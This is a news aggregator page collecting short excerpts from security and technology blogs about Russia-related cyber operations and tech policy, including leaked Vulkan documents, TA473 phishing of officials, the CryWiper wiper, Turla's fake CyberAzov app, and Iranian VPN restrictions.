close
  • Sc chevron_right

    Russian Cyberwarfare Documents Leaked

    news.movim.eu / Schneier · 2 days ago - 22:00

Now this is interesting:

Thousands of pages of secret documents reveal how Vulkan’s engineers have worked for Russian military and intelligence agencies to support hacking operations, train operatives before attacks on national infrastructure, spread disinformation and control sections of the internet.

The company’s work is linked to the federal security service or FSB, the domestic spy agency; the operational and intelligence divisions of the armed forces, known as the GOU and GRU; and the SVR, Russia’s foreign intelligence organisation.

Lots more at the link.

The documents are in Russian, so it will be a while before we get translations.

  • chevron_right

    Pro-Russian hackers target elected US officials supporting Ukraine

    news.movim.eu / ArsTechnica · 2 days ago - 12:19

Locked out.

Enlarge / Locked out. (credit: Sean Gladwell / Getty Images )

Threat actors aligned with Russia and Belarus are targeting elected US officials supporting Ukraine, using attacks that attempt to compromise their email accounts, researchers from security firm Proofpoint said.

The campaign, which also targets officials of European nations, uses malicious JavaScript that’s customized for individual webmail portals belonging to various NATO-aligned organizations, a report Proofpoint published Thursday said. The threat actor—which Proofpoint has tracked since 2021 under the name TA473—employs sustained reconnaissance and painstaking research to ensure the scripts steal targets’ usernames, passwords, and other sensitive login credentials as intended on each publicly exposed webmail portal being targeted.

Tenacious targeting

“This actor has been tenacious in its targeting of American and European officials as well as military and diplomatic personnel in Europe,” Proofpoint threat researcher Michael Raggi wrote in an email. “Since late 2022, TA473 has invested an ample amount of time studying the webmail portals of European government entities and scanning publicly facing infrastructure for vulnerabilities all in an effort to ultimately gain access to emails of those closely involved in government affairs and the Russia-Ukraine war.”

Read 10 remaining paragraphs | Comments

  • chevron_right

    Kazakhstan’s seizure of Russian space assets threatens the Soyuz-5 rocket

    news.movim.eu / ArsTechnica · Tuesday, 21 March - 13:02 · 1 minute

A Russian Proton-M rocket carrying Spain's satellite Amazonas-5 blasts off from the launch pad at the Russian-leased Baikonur cosmodrome in Kazakhstan in 2017.

Enlarge / A Russian Proton-M rocket carrying Spain's satellite Amazonas-5 blasts off from the launch pad at the Russian-leased Baikonur cosmodrome in Kazakhstan in 2017. (credit: KIRILL KUDRYAVTSEV/AFP via Getty Images)

The Soviet Union created the Baikonur Cosmodrome in 1955 to serve as a test site for intercontinental ballistic missiles. A few years later it became the world's first spaceport with the launch of the historic Sputnik 1 and Vostok 1 missions. The sprawling cosmodrome was a mainstay of the Soviet space program.

After the breakup of the Soviet Union, Russia began to lease the spaceport from the government of Kazakhstan and currently has an agreement to use the facilities through the year 2050. Russia pays an annual lease fee of about $100 million. Neither country is particularly happy with the relationship; the Kazakh government feels like it is under-compensated, and the Russian government would like it to be in its own country, which is why it has moved in recent years to build a new launch site for most of its rockets in the Far East of Russia, at Vostochny.

Despite some of this uneasiness, however, the two governments have been working together on future space projects. For example, the main Russian space corporation, Roscosmos, has been developing a new medium-lift rocket that it anticipates launching from Baikonur. This is the Soyuz-5 vehicle, a three-stage rocket powered by RD-171 engines that will burn kerosene fuel. Russia is counting on this vehicle to replace its aging Proton-M rocket and be more cost-competitive with commercial rockets such as SpaceX's Falcon 9 booster.

Read 9 remaining paragraphs | Comments

  • chevron_right

    Fighting VPN criminalization should be Big Tech’s top priority, activists say

    news.movim.eu / ArsTechnica · Monday, 20 March - 11:00 · 1 minute

Fighting VPN criminalization should be Big Tech’s top priority, activists say

Enlarge (credit: Aurich Lawson | Getty Images)

“Women, life, freedom” became the protest chant of a revolution still raging in Iran months after a 22-year-old Kurdish woman, Mahsa Amini, died while in custody of morality police. Amini was arrested last September for “improperly” wearing a hijab and violating the Islamic Republic's mandatory dress code laws. Since then, her name has become a viral hashtag invoked by millions of online activists protesting authoritarian regimes around the globe.

In response to Iran's ongoing protests—mostly led by women and young people—Iranian authorities have increasingly restricted Internet access. First, they temporarily blocked popular app stores and indefinitely blocked social media apps like WhatsApp and Instagram. They then implemented sporadic mobile shutdowns wherever protests flared up. Perhaps most extreme, authorities responded to protests in southeast Iran in February by blocking the Internet outright, Al Arabiya reported . Digital and human rights experts say motivations include controlling information, keeping protestors offline, and forcing protestors to use state services where their online activities can be more easily tracked—and sometimes trigger arrests.

As getting online has become increasingly challenging for everyone in Iran—not just protestors—millions have learned to rely on virtual private networks (VPNs) to hide Internet activity, circumvent blocks, and access accurate information beyond state propaganda. Simply put, VPNs work by masking a user's IP address so that governments have a much more difficult time monitoring activity or detecting a user's location. They do this by routing the user's data to the VPN provider's remote servers, making it much harder for an ISP (or a government) to correlate the Internet activity of the VPN provider's servers with the individual users actually engaging in that activity.

Read 47 remaining paragraphs | Comments

  • Sc chevron_right

    Ukraine Intercepting Russian Soldiers’ Cell Phone Calls

    news.movim.eu / Schneier · Tuesday, 20 December - 23:04

They’re using commercial phones, which go through the Ukrainian telecom network :

“You still have a lot of soldiers bringing cellphones to the frontline who want to talk to their families and they are either being intercepted as they go through a Ukrainian telecommunications provider or intercepted over the air,” said Alperovitch. “That doesn’t pose too much difficulty for the Ukrainian security services.”

[…]

“Security has always been a mess, both in the army and among defence officials,” the source said. “For example, in 2013 they tried to get all the staff at the ministry of defence to replace our iPhones with Russian-made Yoto smartphones.

“But everyone just kept using the iPhone as a second mobile because it was much better. We would just keep the iPhone in the car’s glove compartment for when we got back from work. In the end, the ministry gave up and stopped caring. If the top doesn’t take security very seriously, how can you expect any discipline in the regular army?”

This isn’t a new problem and it isn’t a Russian problem. Here’s a more general article on the problem from 2020.

  • Sc chevron_right

    CryWiper Data Wiper Targeting Russian Sites

    news.movim.eu / Schneier · Monday, 5 December - 22:38

Kaspersky is reporting on a data wiper masquerading as ransomware that is targeting local Russian government networks.

The Trojan corrupts any data that’s not vital for the functioning of the operating system. It doesn’t affect files with extensions .exe, .dll, .lnk, .sys or .msi, and ignores several system folders in the C:\Windows directory. The malware focuses on databases, archives, and user documents.

So far, our experts have seen only pinpoint attacks on targets in the Russian Federation. However, as usual, no one can guarantee that the same code won’t be used against other targets.

Nothing leading to an attribution.

News article .

Slashdot thread .

  • Sc chevron_right

    Russia Creates Malware False-Flag App

    news.movim.eu / Schneier · Wednesday, 20 July, 2022 - 15:32

The Russian hacking group Turla released an Android app that seems to aid Ukrainian hackers in their attacks against Russian networks. It’s actually malware, and provides information back to the Russians:

The hackers pretended to be a “community of free people around the world who are fighting russia’s aggression”—much like the IT Army. But the app they developed was actually malware. The hackers called it CyberAzov, in reference to the Azov Regiment or Battalion, a far-right group that has become part of Ukraine’s national guard . To add more credibility to the ruse they hosted the app on a domain “spoofing” the Azov Regiment: cyberazov[.]com.

[…]

The app actually didn’t DDoS anything, but was designed to map out and figure out who would want to use such an app to attack Russian websites, according to Huntely.

[…]

Google said the fake app wasn’t hosted on the Play Store, and that the number of installs “was miniscule.”

Details from Google’s Threat Analysis Group here .

  • Sc chevron_right

    Microsoft Issues Report of Russian Cyberattacks against Ukraine

    news.movim.eu / Schneier · Thursday, 28 April, 2022 - 14:15

Microsoft has a comprehensive report on the dozens of cyberattacks — and even more espionage operations — Russia has conducted against Ukraine as part of this war:

At least six Russian Advanced Persistent Threat (APT) actors and other unattributed threats, have conducted destructive attacks, espionage operations, or both, while Russian military forces attack the country by land, air, and sea. It is unclear whether computer network operators and physical forces are just independently pursuing a common set of priorities or actively coordinating. However, collectively, the cyber and kinetic actions work to disrupt or degrade Ukrainian government and military functions and undermine the public’s trust in those same institutions.

[…]

Threat groups with known or suspected ties to the GRU have continuously developed and used destructive wiper malware or similarly destructive tools on targeted Ukrainian networks at a pace of two to three incidents a week since the eve of invasion. From February 23 to April 8, we saw evidence of nearly 40 discrete destructive attacks that permanently destroyed files in hundreds of systems across dozens of organizations in Ukraine.